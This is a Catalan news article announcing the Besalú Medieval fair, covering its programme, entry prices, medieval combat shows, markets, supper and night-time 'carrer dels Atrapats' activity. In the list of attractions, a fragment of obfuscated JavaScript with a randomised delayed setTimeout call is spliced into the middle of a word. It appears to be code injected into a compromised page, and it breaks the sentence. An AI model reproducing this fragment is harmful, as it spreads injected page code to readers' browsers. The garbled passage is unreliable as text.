VÍDEO: Al setembre torna la fira Besalú Medieval

Comparteix-ho amb els teus amics:

El 3 i 4 de setembre torna l’epoca medieval a Besalú

La Vila Comtal de Besalú ja ha començat a treballar en la pròxima edició de la seva Fira més coneguda: Besalú Medieval. Un cap de setmana durant el qual Besalú torna mil anys enrere per transformar el centre històric en un plató únic, on la fantasia i la història transporten al visitant a l’antic Comtat de Besalú. El valor del conjunt arquitectònic i històric de la Vila, la converteix en una de les mostres més importants i singulars dels conjunts medievals de Catalunya i durant dos dies, els carrers, la gent, les botigues, els edificis, el passeig fluvial, les muralles, places i racons, no s’escapen de la influència de la Fira Medieval.

VEURE PROGRAMA AQUÍ

https://vimeo.com/137818773

Durant el primer cap de setmana de setembre, Besalú torna mil anys enrere per transformar el centre històric en un plató únic, a on la fantasia i la història transporten al visitant a l’antic Comtat de Besalú. El valor del conjunt arquitectònic i històric de la Vila, la converteix en una de les mostres més importants i singulars dels conjunts medievals de Catalunya i durant dos dies, els carrers, la gent, les botigues i els edificis no s’escapen de la influència de la Fira Medieval.

Aquest esdeveniment s’ha convertit en una de les cites més importants pels milers de visitants que anualment s’apropen a Besalú per gaudir de la seva màgia. Una gran producció que compta amb la implicació de l’administració i més d’un centenar de voluntaris.

Amb l’entrada de 3 € pels adults i gratuïta pels menors de 12 anys, podran gaudir de desenes d’espectacles i tallers que envaeixen el centre històric, des del Pont Vell fins als marges del riu Fluvià. Grans i petits s’endinsaran en un món d’entreteniment i aprenentatge: autèntiques lluites medievals amb armes històriques, escoles de cavallers, oficis i arquers, mercats, abandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}anderats, nombrosos personatges teatrals, músics antics… I no oblidem el carrer dels Atrapats.

A més a més, el visitant podrà degustar la saborosa vedella cuita curosament, volta rere volta, durant el Sopar Medieval que es celebra el dissabte, així com gaudir durant tot el dia dels menús oferts a la Taverna del Seny.

El carrer dels atrapats:

Una activitat pels més atrevits, pels que no tenen por dels personatges més terrorífics ressuscitats de la història medieval més fosca. El divendres i el dissabte a les 10 de la nit, passejar per aquest carrer no deixarà a ningú indiferent. Una activitat duta a terme per voluntaris del poble que ja s’ha consolidat dins del Besalú Medieval.

https://vimeo.com/137813611